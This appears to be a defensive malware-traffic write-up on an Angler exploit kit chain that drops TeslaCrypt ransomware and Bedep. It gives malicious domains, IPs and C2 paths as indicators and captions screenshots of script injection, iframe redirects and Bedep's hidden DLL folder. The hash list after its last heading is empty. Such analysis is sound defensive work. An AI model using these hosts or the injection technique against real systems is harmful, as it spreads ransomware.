Angler EK sends TeslaCrypt and Bedep – Finding Bedeps .dll

ASSOCIATED DOMAINS:

  • 320coldhams.com – COMPROMISED SITE
  • 89.108.83.88 – shark.cruzinshare.com – GET /topic/74728 – ANGLER LANDING PAGE [TeslaCrypt]
  • 46.101.17.191 – asd.yasyka1lyamhochy.info – GET /megaadvertize/? – admedia gate
  • www.ecb.europa.eu – BEDEP POST INFECTION TRAFFIC PATTERN
  • 160.153.49.102 – toolaria.com – POST /sysstr.phpTESLACRYPT POST INFECTION TRAFFIC
  • 64.20.35.186 – diwali2k15.in – POST /sysstr.phpTESLACRYPT POST INFECTION TRAFFIC

IMAGES and DETAILS:

Shown above: Extraction of  compromised sites index page using wireshark. File => Export Objects => HTTP  saving as .htm file for analysis with text editor.

 

Shown above: Index page shows hexadecimal script injection in compromised site redirecting to asd.yasyka1lyamhochy.info admedia gate

 

Shown above: Using Hex to ASCII converter shows redirect to  asd.yasyka1lyamhochy.info

 

Shown above: Index page shows second injection script “iframe” redirecting to shark.cruzinshare.com – Anglers landing page

 

Shown above: Referer shows redirect (iframe) from compromised site  to Angler EK landing page

 

Shown above: A known Bedep pattern used to check if infected computer has an active connection to the internet

 

Shown above: TeslaCrypt post infection traffic. Highlighted area shows new command and control host (C2)

 

Shown above: New naming variant of TeslaCrypt ransom note

 

Shown above: Bedep is known to save its .dll payload in the C:\ProgramData\ directory. Post infection Bedep hid this directory.

 

Shown above: Using SearchMyFiles from Nirsoft you could see the hidden directory. You could also see the two TeslaCrypt .exe files dropped in the Documents folder during the infection.

 

Shown above: Bedep file details

 

Shown above: TeslaCrypt file details dropped in the Documents folder

 

MD5 HASHES FOR EXPLOITS AND PAYLOAD FROM ANGLER EK: